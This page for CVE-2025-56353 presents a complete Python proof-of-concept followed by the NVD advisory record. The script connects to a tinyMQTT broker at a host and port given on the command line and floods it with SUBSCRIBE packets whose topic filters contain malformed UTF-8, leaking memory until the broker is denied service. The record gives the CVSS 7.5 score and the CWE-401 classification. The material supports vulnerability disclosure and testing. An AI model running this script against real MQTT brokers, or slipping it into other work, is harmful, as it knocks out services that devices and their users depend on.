CVE-2025-56353

#!/usr/bin/env python3 """ CVE-2025-56353 PoC - tinyMQTT Memory Leak via Malformed UTF-8 Topic Filters This PoC demonstrates sending MQTT SUBSCRIBE packets with malformed UTF-8 topic filters to trigger memory leak in tinyMQTT broker. """ import socket import time import struct def create_mqtt_connect_packet(client_id): """Create MQTT CONNECT packet""" payload = b'\x00\x04MQTT' # Protocol name payload += b'\x04' # Protocol level 4 (MQTT 3.1.1) payload += b'\x02' # Connect flags payload += struct.pack('>H', 60) # Keep alive 60s payload += struct.pack('>H', len(client_id)) + client_id.encode() packet = b'\x10' # CONNECT packet type packet += bytes([len(payload)]) + payload return packet def create_mqtt_subscribe_packet_with_malformed_utf8(packet_id, topic_filter): """Create MQTT SUBSCRIBE packet with malformed UTF-8 topic filter""" # Topic filter with malformed UTF-8 bytes malformed_topic = topic_filter.encode('utf-8') + b'\x80\x80\x80' payload = struct.pack('>H', packet_id) payload += struct.pack('>H', len(malformed_topic)) + malformed_topic payload += b'\x00' # QoS 0 packet = b'\x82' # SUBSCRIBE packet type packet += bytes([len(payload)]) + payload return packet def exploit_tinymqtt(host, port, num_requests=1000): """ Exploit function to trigger memory leak """ print(f"[*] Connecting to tinyMQTT broker at {host}:{port}") sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((host, port)) # Send CONNECT packet connect_packet = create_mqtt_connect_packet("malformed_utf8_test") sock.send(connect_packet) print("[*] Sent CONNECT packet") # Wait for CONNACK time.sleep(0.5) # Send SUBSCRIBE packets with malformed UTF-8 topic filters print(f"[*] Sending {num_requests} SUBSCRIBE packets with malformed UTF-8...") for i in range(num_requests): malformed_topic = f"test/topic/{'A' * i}\x80\x80" subscribe_packet = create_mqtt_subscribe_packet_with_malformed_utf8(i + 1, malformed_topic) sock.send(subscribe_packet) if i % 100 == 0: print(f"[*] Sent {i} malformed subscription requests") print("[+] Attack completed. Monitor broker memory usage for leak.") sock.close() if __name__ == "__main__": import sys if len(sys.argv) < 3: print(f"Usage: {sys.argv[0]} <target_host> <target_port> [num_requests]") sys.exit(1) host = sys.argv[1] port = int(sys.argv[2]) num_requests = int(sys.argv[3]) if len(sys.argv) > 3 else 1000 exploit_tinymqtt(host, port, num_requests)

{"cve": {"id": "CVE-2025-56353", "sourceIdentifier": "[email protected]", "published": "2026-01-20T16:16:05.700", "lastModified": "2026-02-03T21:54:46.370", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In tinyMQTT commit 6226ade15bd4f97be2d196352e64dd10937c1962 (2024-02-18), a memory leak occurs due to the broker's failure to validate or reject malformed UTF-8 strings in topic filters. An attacker can exploit this by sending repeated subscription requests with arbitrarily large or invalid filter payloads. Each request causes memory to be allocated for the malformed topic filter, but the broker does not free the associated memory, leading to unbounded heap growth and potential denial of service under sustained attack."}, {"lang": "es", "value": "En el commit 6226ade15bd4f97be2d196352e64dd10937c1962 (18-02-2024) de tinyMQTT, se produce una fuga de memoria debido a que el bróker no valida ni rechaza cadenas UTF-8 mal formadas en los filtros de temas. Un atacante puede explotar esto enviando solicitudes de suscripción repetidas con cargas útiles de filtro arbitrariamente grandes o inválidas. Cada solicitud provoca que se asigne memoria para el filtro de tema mal formado, pero el bróker no libera la memoria asociada, lo que lleva a un crecimiento ilimitado del heap y a una posible denegación de servicio bajo un ataque sostenido."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-401"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:justdoit0910:tinymqtt:2024-02-18:*:*:*:*:*:*:*", "matchCriteriaId": "14948FD3-EF8A-4D2B-8510-47E9E20E51B9"}]}]}], "references": [{"url": "https://github.com/JustDoIt0910/tinyMQTT/issues/19", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}]}}